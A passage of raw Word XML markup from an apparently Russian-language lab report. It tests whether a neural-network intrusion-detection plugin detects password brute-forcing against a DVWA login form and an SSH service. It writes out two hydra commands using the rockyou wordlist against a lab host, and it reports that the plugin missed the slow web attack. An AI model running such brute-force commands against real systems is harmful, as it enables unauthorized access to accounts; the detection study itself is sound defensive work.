        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Тестирование проводилось в двух сценариях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. П</w:t>
      </w:r>
      <w:r w:rsidRPr="00160ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>еребор пароля к веб-форме авторизации DVWA и перебор пароля к службе удалённого доступа SSH.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00160ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для реализации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> перебора пароля к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00160ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> использовалась следующая команда:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214462EE" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00160ACC" w:rsidRDefault="000A1CD6" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580AEADB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wordlists</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.104</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> http</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> post form </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"/</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> username</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=^</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>^&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=^</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>^&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>failed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" -</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36274">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CA6CD" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRPr="00B36274" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E0A7A1" w14:textId="269C0461" w:rsidR="008E0171" w:rsidRPr="00160ACC"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Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B9DB0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00160ACC" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352D2661" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4CDE0B" wp14:editId="18B722AE">
            <wp:extent cx="6232196" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2000585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85956" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId41"/>
                    <a:srcRect l="40114" t="16257" r="-144" b="43696"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6241194" cy="2966552"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F462CE" w14:textId="00250C12" w:rsidR="00CD546F" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF462D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00160ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перебор паролей к веб-приложению</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8AC61E" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRPr="00160ACC" w:rsidRDefault="005D6C1B" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E5218E"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60ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В результате нейросетевой плагин не обнаружил данную атаку, хотя большой поток пакетов был зафиксирован. Это объясняется особенностью архитектуры модели — она анализирует метаданные сетевых потоков, а не содержимое запросов. При медленном переборе с паузами между попытками статистические характеристики потока оказываются неотличимы от обычного веб-трафика.</w:t>
      </w:r>
      <w:r w:rsidRPr="0010509B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для реализации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="0010509B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>еребор</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="0010509B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> пароля к службе SSH использовалась следующая команда:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CD708" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384544A4" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vboxuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt ssh://192.168.0.104 -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FF94ED" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRPr="00ED4CBB" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54670B63" w14:textId="535F0D9F" w:rsidR="008E0171" w:rsidRPr="0010509B" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010509B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
